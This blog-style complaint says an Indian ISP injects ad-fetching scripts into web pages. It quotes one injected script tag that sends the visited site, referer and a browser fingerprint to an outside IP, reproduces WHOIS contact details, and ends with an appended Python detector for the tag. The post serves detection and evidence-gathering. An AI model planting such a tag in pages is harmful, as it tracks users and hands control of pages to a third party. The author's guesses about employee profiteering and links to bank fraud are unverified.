See updated info at the end (the new injecting IP of BSNL is 117.254.84.212).
It makes me extremely paranoid to see automatic pop-ups to dangerous advertisement sites like newsprofin, cobalten, etc. I am using legitimate websites like onecsir.res.in (our ERP site) and nmlcsir.attendance.gov.in (the GoI biometric attendance, i.e. AeBAS, site). But sometimes when I click a button or scrollbar or any other navigation control, the ad popup comes up with a malicious website.
I tried many things like resetting the browser, scanning with antivirus, etc., but with no results.
I worried too much and uninstalled almost all software from my PC, including all my licensed software: Texas Instruments development tools and modules, Intel compilers and drivers, Cosmic Software, STM development tools, Visual Studio, etc. I ran almost every antivirus available on the Internet, only to get "no virus found" or false detections like "CCleaner as a trojan" or "a VS tool as FakeMS". I removed those too, but still got the nonsense popups.
Now I do not even have the printer, scanner, audio or video drivers in the system.
STILL GETTING THE NEWSPROFIN AND COBALTEN. Extremely irritated; lost more than two weeks. What the hell is our licensed business version of Kaspersky doing? But why blame only Kaspersky: I failed to remove these even using other antiviruses like Quick Heal, Bitdefender, Qihoo 360, Avira, and all the antispyware tools like AdAware, SpyHunter, RKill......
I suspected DNS spoofing, so I installed Unbound and configured it to use Cloudflare DNS, but that did not resolve the issue. I thought I would have to configure it for the lab at a later stage to avoid any DNS spoofing.
At last I found that some rascal sitting at BSNL (our ISP) is doing the menace. I installed a very old tool as a proxy to intercept all URLs, IPs, headers and data flowing to and from my browser. Two observations surprised me:
1. Whenever Chrome starts, a number of random URL queries get generated with various different names; DNS fails to provide any IP for them and they do not fetch any data.
I found out by googling that this is normal behaviour of Chrome, testing its own workings internally.
2. The sites above are trying to fetch some URL (script) from a BSNL IP, 117.245.143.67, which in turn goes and gets these advertisements. A script was injected into the original contents in the page header.
Quite surprising: two different sites trying to fetch from the same IP.
Then I tried to find what's common!!! Both are using Flash. I tried checking with another Flash site and found that it was also trying to get scripts from the SAME IP!!!!!!!!!
See screenshots below. No doubt some BSNL employee or contractor/vendor may be earning HUGE MONEY by modifying the traffic of legitimate websites and injecting these scripts to fetch advertisements. But it is handing over control through a script embedded in the same legitimate web page.
I have got such redirected pop-ups even from the ICICI Bank website..... It's too dangerous..... It's sending a lot of information to the advertiser website, including the website you are accessing, location, username, etc....
When the script is called from the same webpage (as the script was injected into the same page), if you are a developer you can imagine what can be done. The content of the script has full control over the page and its variables. The password or username can easily be fetched or modified.
Do I need to say more...
WHOM TO COMPLAIN TO, I DO NOT KNOW. How many people understand these technological terms/issues? Who will take up these legal issues?
Such modification and injection of malicious scripts by an ISP is a heinous crime. Can anyone take this up legally? How does one obtain and preserve evidence?
There have been three cases of bank fraud recently at CSIR-NML; I do not know if these are connected/related. One of my financial sites locked my password due to too many invalid login attempts. I reset and changed the password, but they do not divulge the source IP of the offender.
After getting the URL I searched Google for "getjs?nadipdata" and found the following references (earlier I was searching for the words newsprofin and cobalten, only to land on wrong sites with cleanup instructions):
https://www.quora.com/profile/Shiv-Kumar-148
https://stackoverflow.com/questions/51064933/unknown-scripts-are-running-and-redirecting-on-click-to-unknown-websties
https://www.abuseipdb.com/check/117.245.143.67
http://ddecode.com/hexdecoder/?results=e49a704a3dad51b190f3f83b78427cc8
https://security.stackexchange.com/questions/157828/my-isp-bsnl-india-is-injecting-ads-using-phozeca-which-spoils-websites-and-mak
https://www.liveipmap.com/117.245.143.67
https://gist.github.com/asdofindia
https://bgjir.wordpress.com/tag/malware/
https://tutel.me/c/programming/questions/51064933/unknown+scripts+are+running+and+redirecting+on+click+to+unknown+websties
I do not know how much proof BSNL needs to take serious action on the owner of IP 117.245.143.67.
Such episodes are really painful; I lost my peace of mind for more than two weeks. I still do not know what to do. When your ISP does such things, what can you do?
Here are some captured screenshots (IP owner info below):
IP owner information as per the ICANN record:
inetnum: 117.245.128.0 - 117.245.143.255
netname: BSNL-GSM-NorthZone
descr: BSNL GSM North Zone, O/o Sr GM (CMTS), NC, Chandigarh
country: IN
admin-c: JS2127-AP
tech-c: RV131-AP
status: ASSIGNED NON-PORTABLE
mnt-by: MAINT-IN-DOT
mnt-irt: IRT-BSNL-IN
last-modified: 2014-12-02T09:38:12Z
source: APNIC
irt: IRT-BSNL-IN
address: Internet Cell
address: Bharat Sanchar Nigam Limited
address: 8th Floor,148-B Statesman House
address: Barakhamba Road, New Delhi - 110 001
e-mail: abuse@bsnl.in
abuse-mailbox: abuse@bsnl.in
admin-c: NC83-AP
tech-c: CGMD1-AP
auth: # Filtered
mnt-by: MAINT-IN-DOT
last-modified: 2017-10-20T05:42:50Z
source: APNIC
person: Jitender Setia
address: Addl GM (P&A), O/o Sr GM (CMTS), NC, Chandigarh
country: IN
phone: +91-172-2271033
fax-no: +91-172-2271033
e-mail: dgmdevnc@gmail.com
nic-hdl: JS2127-AP
mnt-by: MAINT-IN-PER-DOT
last-modified: 2012-12-10T09:50:52Z
source: APNIC
person: Rajiv Verma
address: SDE (IN-Opn-III), O/o Sr GM (CMTS), NC, Chandigarh
country: IN
phone: +91-172-2271033
fax-no: +91-172-2271033
e-mail: rajiv6789@gmail.com
nic-hdl: RV131-AP
mnt-by: MAINT-IN-PER-DOT
last-modified: 2012-12-10T09:51:08Z
source: APNIC
route: 117.245.128.0/20
descr: BSNL Internet
country: IN
origin: AS9829
mnt-lower: MAINT-IN-DOT
mnt-routes: MAINT-IN-DOT
mnt-by: MAINT-IN-AS9829
last-modified: 2008-09-04T07:55:07Z
source: APNIC
Update 04Sep2019: BSNL is now injecting the following script:
<script async="" src="//117.254.84.212:3000/getjs?nadipdata="%7B%22url%22:%22%2Fjquery-1.11.3.min.js%22%2C%22referer%22:%22http:%2F%2Fwww.vizzed.com%2Fboards%2Fthread.php%3Fid%3D72161%22%2C%22host%22:%22www.vizzed.com%22%2C%22categories%22:%5B0%5D%2C%22reputations%22:%5B1%5D%2C%22nadipdomain%22:1%2C%22policyid%22:0%7D"&screenheight=1080&screenwidth=1920&tm=1567601038449&lib=true&fingerprint=c2VwLW5vLXJlZGlyZWN0"></script>
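The injected tag above, taken apart with an added Python example (my code, not anything from this post or from BSNL): it scans a captured page body for script tags pointing at the two injector IPs named in the post, decodes the nadipdata and fingerprint parameters to show what the tag reports upstream about the user's browsing, and hashes the body with a timestamp so the finding can be preserved and reported. The page body is a constructed sample built around the tag from the update; only plain-HTTP pages can be rewritten in transit like this, which is why the same tag turns up across unrelated sites.

```python
import base64
import hashlib
import json
import re
from datetime import datetime, timezone
from urllib.parse import parse_qs, urlsplit

KNOWN_INJECTOR_HOSTS = {"117.245.143.67", "117.254.84.212"}  # IPs captured in this post
INJECTOR_MARKER = "getjs?nadipdata="
SCRIPT_SRC_RE = re.compile(r'<script[^>]*\bsrc\s*=\s*["\']([^"\']+)["\']', re.IGNORECASE)

# Constructed sample: a plain-HTTP page body after the ISP inserted the tag from the 04Sep2019 update.
SAMPLE_HTML = (
    '<html><head><script async="" src="//117.254.84.212:3000/getjs?nadipdata=%7B%22url%22:'
    '%22%2Fjquery-1.11.3.min.js%22%2C%22referer%22:%22http:%2F%2Fwww.vizzed.com%2Fboards'
    '%2Fthread.php%3Fid%3D72161%22%2C%22host%22:%22www.vizzed.com%22%2C%22categories%22:'
    '%5B0%5D%2C%22reputations%22:%5B1%5D%2C%22nadipdomain%22:1%2C%22policyid%22:0%7D'
    '&screenheight=1080&screenwidth=1920&tm=1567601038449&lib=true'
    '&fingerprint=c2VwLW5vLXJlZGlyZWN0"></script>'
    '<script src="/jquery-1.11.3.min.js"></script></head><body>ok</body></html>'
)

def find_injected_scripts(html):
    """Return src values of <script> tags that point at a known injector."""
    hits = []
    for src in SCRIPT_SRC_RE.findall(html):
        host = urlsplit(src).hostname or ""
        if host in KNOWN_INJECTOR_HOSTS or INJECTOR_MARKER in src:
            hits.append(src)
    return hits

def decode_nadipdata(src):
    """Decode what the injected URL reports upstream: visited host, referer, screen size, fingerprint."""
    q = parse_qs(urlsplit(src).query)
    fp = q.get("fingerprint", [""])[0]
    return {
        "leaked": json.loads(q.get("nadipdata", ["{}"])[0]),
        "screen": (int(q.get("screenwidth", ["0"])[0]), int(q.get("screenheight", ["0"])[0])),
        "fingerprint": base64.b64decode(fp + "=" * (-len(fp) % 4)).decode("utf-8", "replace"),
    }

def evidence_record(page_url, html):
    """Hash and timestamp the captured body so the finding can be preserved and reported."""
    return {
        "page": page_url,
        "captured_at": datetime.now(timezone.utc).isoformat(),
        "body_sha256": hashlib.sha256(html.encode("utf-8")).hexdigest(),
        "injected": [decode_nadipdata(s) for s in find_injected_scripts(html)],
    }
```

Feed it the raw HTTP response body saved from the intercepting proxy; a clean page yields an empty "injected" list, while a tampered one gives the decoded parameters plus a hash of the body to attach to a complaint.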